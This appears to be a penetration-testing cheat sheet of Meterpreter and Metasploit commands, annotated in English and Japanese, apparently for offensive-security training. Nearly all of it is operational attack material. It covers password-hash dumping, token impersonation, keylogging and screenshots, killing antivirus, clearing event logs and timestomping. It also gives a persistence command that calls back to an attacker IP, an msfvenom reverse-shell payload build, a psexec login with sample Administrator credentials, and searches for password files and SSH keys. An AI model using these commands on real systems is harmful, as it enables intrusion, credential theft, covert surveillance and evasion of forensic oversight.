Meterpreter
1
<Commands>
2
sysinfo
3
# displays the information about the victim like Name, OS Type, Architecture,Domain and Language.
4
5
getuid
6
# Display the user that the Meterpreter server is running as on the host.
7
8
getpid
9
10
search - f *pass.txt*
11
# Provides a way of locating specific files on the target host
12
13
ps
14
# Displays a list of running processes on the target
15
16
upload
17
# As with the download command, you need to use double-slashes with the upload command
18
19
downlaod
20
# Downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
21
22
get system -t
23
rev2self
24
migrate <pid>
25
26
execute -f cmd.exe -c -H
27
# Execute command runs a command on the target.
28
29
shell
30
# Present you with a standard shell on the target system.
31
32
getdesktop
33
34
load <module>
35
# Load a framework plugin
36
37
clearev
38
# Clear the Application, System, and Security logs on a Windows system.
39
40
background
41
# send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again.
42
43
hashdump
44
# retrieve the password hashes from the victim
45
46
run checkvm
47
run get_env
48
route
49
run get_application_list
50
run killav
51
52
keyscan_start
53
keyscan_dump
54
keyscan_stop
55
screengrab
56
57
hashdump
58
timestomp
59
load
60
61
--------------------------------
62
sysinfo
63
* 侵入先端末の環境の把握
64
* OS Verson、アーキテクチャ、
65
66
getuid
67
* 侵入先端末上で侵害したサービス権限
68
69
getpid
70
* カレントPIDの取得
71
72
search
73
* search -f *pass*.txt
74
75
ps
76
* 動作中のプロセスの一覧(実行ユーザやファイルパス)
77
78
run checkvm
79
* 侵害端末がVM上で動作しているかどうか確認
80
81
run get_env
82
* 侵害端末の環境の把握
83
84
route
85
* ルーティング情報を確認
86
* route add <同端末の中継先IP(他のnicに紐付いているip)> <subnet> <meterpreter session>
87
* 追加したipにトラッフィクを中継
88
* route print
89
* 追加したルーティングを確認
90
91
run get_application_list
92
* インストールされたアプリの一覧の取得
93
94
run
95
* meterpreterで実行可能なスクリプトの一覧を取得
96
97
upload
98
* upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
99
100
download
101
* download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
102
103
104
show targets
105
* ターゲットのアーキテクチャーの候補を表示
106
107
set target 2
108
* 候補の中からアーキテクチャーを選択
109
110
get system
111
* getsystem -t (number)
112
* 権限昇格の方法を指定して実行
113
rev2self
114
* 昇格した権限を戻す(system→user)
115
116
migrate (pid)
117
* 指定したプロセスにマイグレートする
118
119
execute -f cmd.exe -c -H
120
* hidden viewでcmd.exeを表示
121
122
interact (num)
123
* 上記で起動したcmd.exeを選択
124
125
run killav
126
* 文字列マッチしたスクリプトで定義済みのAV関連のプロセスをKill
127
128
getdesktop
129
* 現在のプロセスが保持するデスクトップ種別を表示
130
* Service-0x0: Non-Interactive Desktop
131
* Winsta0: Interactive Desktop
132
* ScreenshotやKeyloggingやSniffingが可能
133
* ログインshell(exploer.exe)にmigrateするとNon-Interactive Desktopを取得可
134
keyscan_start
135
* キーロガー起動
136
137
keyscan_dump
138
* キーロガーのダンプ
139
140
keyscan_stop
141
* キーロガー停止
142
143
screengrab
144
* スクリーンショットの取得
145
146
<load sniffer>
147
* スニフィングを可能にする
148
149
hashdump
150
* パスワードハッシュ取得
151
152
timestomp
153
* タイムスタンプ(MACE: Modified Accessed Created-Entry)の変更
154
* timestomp sample.txt -z “01/01/2020 11:11:11"
155
156
load (module)
157
* meterpreterのモジュールをロード
158
* 標準以外のコマンドを実行
159
160
clearav
161
* windows Event ログの削除
162
163
<Token Impersonation & Delegaton>
164
steal_token pid
165
* 指定したpidのプロセスの実行ユーザのトークンを奪取
166
167
droptoken
168
* 奪取したトークンをドロップ
169
170
load incognito
171
* list_tokens -u
172
* user idで利用可能なDelegation/Impersonationトークンの一覧を表示
173
* impersonate_token <トークン名>
174
* 指定したトークンになりすまし
175
* getuid
176
* なりすましたuser id (トークン)を表示
177
* rever2self
178
* なりすまし前のトークンに戻る
179
※Primary Token(SID、Groups、Privileges、Other info)
180
※Impersonation Tokenは、大元プロセスのToken(Primary Token)のメモリ内に存在
181
182
run persistence
183
* run persistence -A -L c¥¥ -X -i 10 -p 443 -r ip
184
* -L: ペイロードの配置場所
185
* -A: multiハンドラーの自動起動
186
* -p: Metasploitで待ち受けるポート
187
* -r: Metasploitで待ち受けするip
188
* -X: ブート時に接続
189
* -U: ユーザログオン時に接続
190
* -i: コネクション間のインターバル
191
192
resource <.rcのPath>
193
* レジストリ追加によるPersisnteceの  解除(配置したペイロードの削除、プロセスのKill、レジストリの解除)
194
* resource /root/.msf4/logs/persistence/****/**.rc
195
196
background
197
* アクティブなmeterpreterシェルをBackgroundへ移行
198
199
use auxiliary/scanner/portscan/tcp
200
* meterpreter上でポートスキャンを実施
201
202
run arp_scanner -r x.x.x.x/24
203
* 指定したセグメントへのarp-scan
204
205
portfwd add -l <dst port> -p <forward port> -r <remote ip>
206
* ポートフォワーディングによるdstとforward間中継
207
208
portfwd list
209
* 追加されたポートフォワード設定の表示
210
211
msfvenom -p windows/meterpreter/ reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
212
213
use exploit(usermap_script) > info
214
215
use exploit(usermap_script) > show missing
216
217
show payloads
218
219
use exploit/multi/http/atutor_sqli
220
221
check
222
223
msf > use exploit/windows/smb/psexec
224
msf exploit(psexec) > set SMBUSER Administrator
225
SMBUSER => Administrator
226
msf exploit(psexec) > set SMBPASS vagrant
227
SMBPASS => vagrant
228
msf exploit(psexec) > run
229
230
getprivs
231
全ての権限を現在のプロセスに付与する
232
233
getsid
234
sidの表示
235
236
237
use exploit/multi/handler
238
239
240
jobs
241
242
sessions -i
243
244
sessions -l
245
246
Metasploit Module Path
247
/usr/share/metasploit-framework/modules/exploits/
Copied!

Interesting files

1
#Meterpreter
2
search -f *.txt
3
search -f *.zip
4
search -f *.doc
5
search -f *.xls
6
search -f config*
7
search -f *.rar
8
search -f *.docx
9
search -f *.sql
10
11
.ssh:
12
.bash_history
Copied!
Meterpreter Basic Commands | Offensive Security
offsectraining
Beginner Guide to Meterpreter (Part 1) - Hacking Articles
Hacking Articles
misc_tools_sheet_v1 (1).pdf
131KB
PDF
Last modified 1yr ago
Copy link